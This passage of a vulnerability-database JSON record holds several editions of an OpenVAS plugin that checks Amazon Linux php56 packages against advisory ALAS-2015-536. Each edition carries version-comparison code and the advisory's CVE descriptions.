rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-xml\", rpm:\"php56-xml~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-mcrypt\", rpm:\"php56-mcrypt~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-recode\", rpm:\"php56-recode~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-dba\", rpm:\"php56-dba~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-xmlrpc\", rpm:\"php56-xmlrpc~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-pgsql\", rpm:\"php56-pgsql~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-mbstring\", rpm:\"php56-mbstring~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-pspell\", rpm:\"php56-pspell~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56\", rpm:\"php56~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-embedded\", rpm:\"php56-embedded~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-gmp\", rpm:\"php56-gmp~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-soap\", rpm:\"php56-soap~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-opcache\", rpm:\"php56-opcache~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-tidy\", rpm:\"php56-tidy~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-snmp\", rpm:\"php56-snmp~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-dbg\", rpm:\"php56-dbg~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99); #Not vulnerable\n exit(0);\n}\n", "title": "Amazon Linux Local Check: alas-2015-536", "type": "openvas", "viewCount": 0}, "differentElements": ["cvss"], "edition": 3, "lastseen": "2017-07-24T12:53:50"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2015-2325", "CVE-2015-4025", "CVE-2015-4024", "CVE-2015-4021", "CVE-2015-4026", "CVE-2015-4022", "CVE-2015-2326"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "Amazon Linux Local Security Checks", "edition": 2, "enchantments": {}, "hash": "b5a5afe45e7c43b10b70850efbb95eccde3d251cfc5a595f10c92c6af87e9a7f", "hashmap": [{"hash": "3984a841a83f9bbaddbf64db40746d40", "key": "modified"}, {"hash": "88a3eef0ad62d205a032ce1b85679e1d", "key": "sourceData"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "051d3fa80639370fd8e85d743d26684b", "key": "cvelist"}, {"hash": "15a1c50a40bcb97a18bd75742b61fd60", "key": "pluginID"}, {"hash": "166e43b7efd51fc461aa157ed9ed169d", "key": "published"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "c987a25a392ca9438af43d057067b21a", "key": "href"}, {"hash": "df5cd238ab6ba820ee0b13c493f1bcd6", "key": "naslFamily"}, {"hash": "73a8d6ff1a2cd0ef2d387ce18a30cf50", "key": "title"}, {"hash": "df5cd238ab6ba820ee0b13c493f1bcd6", "key": "description"}, {"hash": "260dd5f8477dc74ecc091d01197c5f94", "key": "references"}, {"hash": "bb3dbc0ecae053747a8a163af717a25f", "key": "reporter"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120222", "id": "OPENVAS:1361412562310120222", "lastseen": "2017-07-18T10:52:46", "modified": "2017-07-03T00:00:00", "naslFamily": "Amazon Linux Local Security Checks", "objectVersion": "1.3", "pluginID": "1361412562310120222", "published": "2015-09-08T00:00:00", "references": ["https://alas.aws.amazon.com/ALAS-2015-536.html"], "reporter": "Eero Volotinen", "sourceData": "# OpenVAS Vulnerability Test \n# Description: Amazon Linux security check \n# $Id: alas-2015-536.nasl 6505 2017-07-03 09:58:27Z teissa $\n \n# Authors: \n# Eero Volotinen <eero.volotinen@iki.fi> \n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://ping-viini.org \n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\nif(description)\n {\nscript_oid(\"1.3.6.1.4.1.25623.1.0.120222\");\nscript_version(\"$Revision: 6505 $\");\nscript_tag(name:\"creation_date\", value:\"2015-09-08 13:20:42 +0200 (Tue, 08 Sep 2015)\");\nscript_tag(name:\"last_modification\", value:\"$Date: 2017-07-03 11:58:27 +0200 (Mon, 03 Jul 2017) $\");\nscript_name(\"Amazon Linux Local Check: alas-2015-536\");\nscript_tag(name: \"insight\", value: \"An integer underflow flaw leading to out-of-bounds memory access was found in the way PHP's Phar extension parsed Phar archives. A specially crafted archive could cause PHP to crash or, possibly, execute arbitrary code when opened. (CVE-2015-4021 )An integer overflow flaw leading to a heap based buffer overflow was found in the way PHP's FTP extension parsed file listing FTP server responses. A malicious FTP server could use this flaw to cause a PHP application to crash or, possibly, execute arbitrary code. (CVE-2015-4022 )A flaw was found in the way PHP parsed multipart HTTP POST requests. A specially crafted request could cause PHP to use an excessive amount of CPU time. (CVE-2015-4024 )It was found that certain PHP functions did not properly handle file names containing a NULL character. A remote attacker could possibly use this flaw to make a PHP script access unexpected files and bypass intended file system access restrictions. (CVE-2015-4025 )It was found that certain PHP functions did not properly handle file names containing a NULL character. A remote attacker could possibly use this flaw to make a PHP script access unexpected files and bypass intended file system access restrictions. (CVE-2015-4026 )PCRE library is prone to a heap overflow vulnerability. Due to insufficient bounds checking inside compile_branch(), the heap memory could be overflowed via a crafted regular expression. Since PCRE library is widely used, this vulnerability should affect many applications using it. An attacker may exploit this issue to execute arbitrary code in the context of the user running the affected application. (CVE-2015-2325 )PCRE library is prone to a vulnerability which leads to Heap overflow. Without enough bound checking inside pcre_compile2(), the heap memory could be overflowed via a crafted regular expression. Since PCRE library is widely used, this vulnerability should affect many applications. An attacker may exploit this issue to execute arbitrary code in the context of the user running the affected application. (CVE-2015-2326 )\"); \nscript_tag(name : \"solution\", value : \"Run yum update php56 to update your system.\");\nscript_tag(name : \"solution_type\", value : \"VendorFix\");\nscript_xref(name : \"URL\" , value : \"https://alas.aws.amazon.com/ALAS-2015-536.html\");\nscript_cve_id(\"CVE-2015-4021\",\"CVE-2015-4022\",\"CVE-2015-4025\",\"CVE-2015-4024\",\"CVE-2015-4026\",\"CVE-2015-2325\",\"CVE-2015-2326\");\nscript_tag(name:\"cvss_base\", value:\"7.5\");\nscript_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\nscript_tag(name:\"qod_type\", value:\"package\");\nscript_dependencies(\"gather-package-list.nasl\");\nscript_mandatory_keys(\"HostDetails/OS/cpe:/o:amazon:linux\", \"login/SSH/success\", \"ssh/login/release\");\nscript_category(ACT_GATHER_INFO);\nscript_tag(name:\"summary\", value:\"Amazon Linux Local Security Checks\");\nscript_copyright(\"Eero Volotinen\");\nscript_family(\"Amazon Linux Local Security Checks\");\nexit(0);\n}\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\nrelease = get_kb_item(\"ssh/login/release\");\nres = \"\";\nif(release == NULL)\n{\n exit(0);\n}\nif(release == \"AMAZON\")\n{\nif ((res = isrpmvuln(pkg:\"php56-ldap\", rpm:\"php56-ldap~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-bcmath\", rpm:\"php56-bcmath~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-cli\", rpm:\"php56-cli~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-intl\", rpm:\"php56-intl~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-devel\", rpm:\"php56-devel~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-common\", rpm:\"php56-common~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-imap\", rpm:\"php56-imap~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-gd\", rpm:\"php56-gd~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-mysqlnd\", rpm:\"php56-mysqlnd~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-mssql\", rpm:\"php56-mssql~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-enchant\", rpm:\"php56-enchant~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-debuginfo\", rpm:\"php56-debuginfo~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-process\", rpm:\"php56-process~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-fpm\", rpm:\"php56-fpm~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-pdo\", rpm:\"php56-pdo~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-odbc\", rpm:\"php56-odbc~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-xml\", rpm:\"php56-xml~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-mcrypt\", rpm:\"php56-mcrypt~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-recode\", rpm:\"php56-recode~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-dba\", rpm:\"php56-dba~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-xmlrpc\", rpm:\"php56-xmlrpc~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-pgsql\", rpm:\"php56-pgsql~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-mbstring\", rpm:\"php56-mbstring~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-pspell\", rpm:\"php56-pspell~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56\", rpm:\"php56~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-embedded\", rpm:\"php56-embedded~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-gmp\", rpm:\"php56-gmp~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-soap\", rpm:\"php56-soap~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-opcache\", rpm:\"php56-opcache~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-tidy\", rpm:\"php56-tidy~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-snmp\", rpm:\"php56-snmp~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-dbg\", rpm:\"php56-dbg~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99); #Not vulnerable\n exit(0);\n}\n", "title": "Amazon Linux Local Check: alas-2015-536", "type": "openvas", "viewCount": 0}, "differentElements": ["modified", "sourceData"], "edition": 2, "lastseen": "2017-07-18T10:52:46"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2015-2325", "CVE-2015-4025", "CVE-2015-4024", "CVE-2015-4021", "CVE-2015-4026", "CVE-2015-4022", "CVE-2015-2326"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "Amazon Linux Local Security Checks", "edition": 5, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "465b42b1c14295fa4e5071e396ed5f0d054197109c51db354cf2598ac0796896", "hashmap": [{"hash": "774d0176dfa389c0c71e9e200f95a6ba", "key": "modified"}, {"hash": "135e225c708bd184a2226d1dab09a629", "key": "sourceData"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "051d3fa80639370fd8e85d743d26684b", "key": "cvelist"}, {"hash": "15a1c50a40bcb97a18bd75742b61fd60", "key": "pluginID"}, {"hash": "166e43b7efd51fc461aa157ed9ed169d", "key": "published"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "c987a25a392ca9438af43d057067b21a", "key": "href"}, {"hash": "df5cd238ab6ba820ee0b13c493f1bcd6", "key": "naslFamily"}, {"hash": "73a8d6ff1a2cd0ef2d387ce18a30cf50", "key": "title"}, {"hash": "df5cd238ab6ba820ee0b13c493f1bcd6", "key": "description"}, {"hash": "260dd5f8477dc74ecc091d01197c5f94", "key": "references"}, {"hash": "bb3dbc0ecae053747a8a163af717a25f", "key": "reporter"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120222", "id": "OPENVAS:1361412562310120222", "lastseen": "2018-09-01T23:49:39", "modified": "2017-07-06T00:00:00", "naslFamily": "Amazon Linux Local Security Checks", "objectVersion": "1.3", "pluginID": "1361412562310120222", "published": "2015-09-08T00:00:00", "references": ["https://alas.aws.amazon.com/ALAS-2015-536.html"], "reporter": "Eero Volotinen", "sourceData": "# OpenVAS Vulnerability Test \n# Description: Amazon Linux security check \n# $Id: alas-2015-536.nasl 6575 2017-07-06 13:42:08Z cfischer $\n \n# Authors: \n# Eero Volotinen <eero.volotinen@iki.fi> \n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://ping-viini.org \n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\nif(description)\n {\nscript_oid(\"1.3.6.1.4.1.25623.1.0.120222\");\nscript_version(\"$Revision: 6575 $\");\nscript_tag(name:\"creation_date\", value:\"2015-09-08 13:20:42 +0200 (Tue, 08 Sep 2015)\");\nscript_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 15:42:08 +0200 (Thu, 06 Jul 2017) $\");\nscript_name(\"Amazon Linux Local Check: alas-2015-536\");\nscript_tag(name: \"insight\", value: \"An integer underflow flaw leading to out-of-bounds memory access was found in the way PHP's Phar extension parsed Phar archives. A specially crafted archive could cause PHP to crash or, possibly, execute arbitrary code when opened. (CVE-2015-4021 )An integer overflow flaw leading to a heap based buffer overflow was found in the way PHP's FTP extension parsed file listing FTP server responses. A malicious FTP server could use this flaw to cause a PHP application to crash or, possibly, execute arbitrary code. (CVE-2015-4022 )A flaw was found in the way PHP parsed multipart HTTP POST requests. A specially crafted request could cause PHP to use an excessive amount of CPU time. (CVE-2015-4024 )It was found that certain PHP functions did not properly handle file names containing a NULL character. A remote attacker could possibly use this flaw to make a PHP script access unexpected files and bypass intended file system access restrictions. (CVE-2015-4025 )It was found that certain PHP functions did not properly handle file names containing a NULL character. A remote attacker could possibly use this flaw to make a PHP script access unexpected files and bypass intended file system access restrictions. (CVE-2015-4026 )PCRE library is prone to a heap overflow vulnerability. Due to insufficient bounds checking inside compile_branch(), the heap memory could be overflowed via a crafted regular expression. Since PCRE library is widely used, this vulnerability should affect many applications using it. An attacker may exploit this issue to execute arbitrary code in the context of the user running the affected application. (CVE-2015-2325 )PCRE library is prone to a vulnerability which leads to Heap overflow. Without enough bound checking inside pcre_compile2(), the heap memory could be overflowed via a crafted regular expression. Since PCRE library is widely used, this vulnerability should affect many applications. An attacker may exploit this issue to execute arbitrary code in the context of the user running the affected application. (CVE-2015-2326 )\"); \nscript_tag(name : \"solution\", value : \"Run yum update php56 to update your system.\");\nscript_tag(name : \"solution_type\", value : \"VendorFix\");\nscript_xref(name : \"URL\" , value : \"https://alas.aws.amazon.com/ALAS-2015-536.html\");\nscript_cve_id(\"CVE-2015-4021\",\"CVE-2015-4022\",\"CVE-2015-4025\",\"CVE-2015-4024\",\"CVE-2015-4026\",\"CVE-2015-2325\",\"CVE-2015-2326\");\nscript_tag(name:\"cvss_base\", value:\"7.5\");\nscript_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\nscript_tag(name:\"qod_type\", value:\"package\");\nscript_dependencies(\"gather-package-list.nasl\");\nscript_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\nscript_category(ACT_GATHER_INFO);\nscript_tag(name:\"summary\", value:\"Amazon Linux Local Security Checks\");\nscript_copyright(\"Eero Volotinen\");\nscript_family(\"Amazon Linux Local Security Checks\");\nexit(0);\n}\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\nrelease = get_kb_item(\"ssh/login/release\");\nres = \"\";\nif(release == NULL)\n{\n exit(0);\n}\nif(release == \"AMAZON\")\n{\nif ((res = isrpmvuln(pkg:\"php56-ldap\", rpm:\"php56-ldap~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-bcmath\", rpm:\"php56-bcmath~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-cli\", rpm:\"php56-cli~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-intl\", rpm:\"php56-intl~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-devel\", rpm:\"php56-devel~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-common\", rpm:\"php56-common~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-imap\", rpm:\"php56-imap~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-gd\", rpm:\"php56-gd~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-mysqlnd\", rpm:\"php56-mysqlnd~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-mssql\", rpm:\"php56-mssql~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-enchant\", rpm:\"php56-enchant~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-debuginfo\", rpm:\"php56-debuginfo~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-process\", rpm:\"php56-process~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-fpm\", rpm:\"php56-fpm~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-pdo\", rpm:\"php56-pdo~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-odbc\", rpm:\"php56-odbc~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-xml\", rpm:\"php56-xml~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-mcrypt\", rpm:\"php56-mcrypt~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-recode\", rpm:\"php56-recode~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-dba\", rpm:\"php56-dba~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-xmlrpc\", rpm:\"php56-xmlrpc~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-pgsql\", rpm:\"php56-pgsql~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-mbstring\", rpm:\"php56-mbstring~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-pspell\", rpm:\"php56-pspell~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56\", rpm:\"php56~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-embedded\", rpm:\"php56-embedded~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-gmp\", rpm:\"php56-gmp~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-soap\", rpm:\"php56-soap~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-opcache\", rpm:\"php56-opcache~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-tidy\", rpm:\"php56-tidy~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-snmp\", rpm:\"php56-snmp~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-dbg\", rpm:\"php56-dbg~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99); #Not vulnerable\n exit(0);\n}\n", "title": "Amazon Linux Local Check: alas-2015-536", "type": "openvas", "viewCount": 0}, "differentElements": ["modified", "sourceData"], "edition": 5, "lastseen": "2018-09-01T23:49:39"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2015-2325", "CVE-2015-4025", "CVE-2015-4024", "CVE-2015-4021", "CVE-2015-4026", "CVE-2015-4022", "CVE-2015-2326"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "Amazon Linux Local Security Checks", "edition": 1, "enchantments": {}, "hash": "a72e7891e5cfa469229b15fb3be95a02746f5b7b0b30bf53e3e6c7a67f1c306f", "hashmap": [{"hash": "5029de750654892f1966bd4d7c25eb74", "key": "sourceData"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "451ccf9b33cae434b1236ed7a06114ec", "key": "modified"}, {"hash": "051d3fa80639370fd8e85d743d26684b", "key": "cvelist"}, {"hash": "15a1c50a40bcb97a18bd75742b61fd60", "key": "pluginID"}, {"hash": "166e43b7efd51fc461aa157ed9ed169d", "key": "published"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "c987a25a392ca9438af43d057067b21a", "key": "href"}, {"hash": "df5cd238ab6ba820ee0b13c493f1bcd6", "key": "naslFamily"}, {"hash": "73a8d6ff1a2cd0ef2d387ce18a30cf50", "key": "title"}, {"hash": "df5cd238ab6ba820ee0b13c493f1bcd6", "key": "description"}, {"hash": "260dd5f8477dc74ecc091d01197c5f94", "key": "references"}, {"hash": "bb3dbc0ecae053747a8a163af717a25f", "key": "reporter"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120222", "id": "OPENVAS:1361412562310120222", "lastseen": "2017-07-02T21:12:30", "modified": 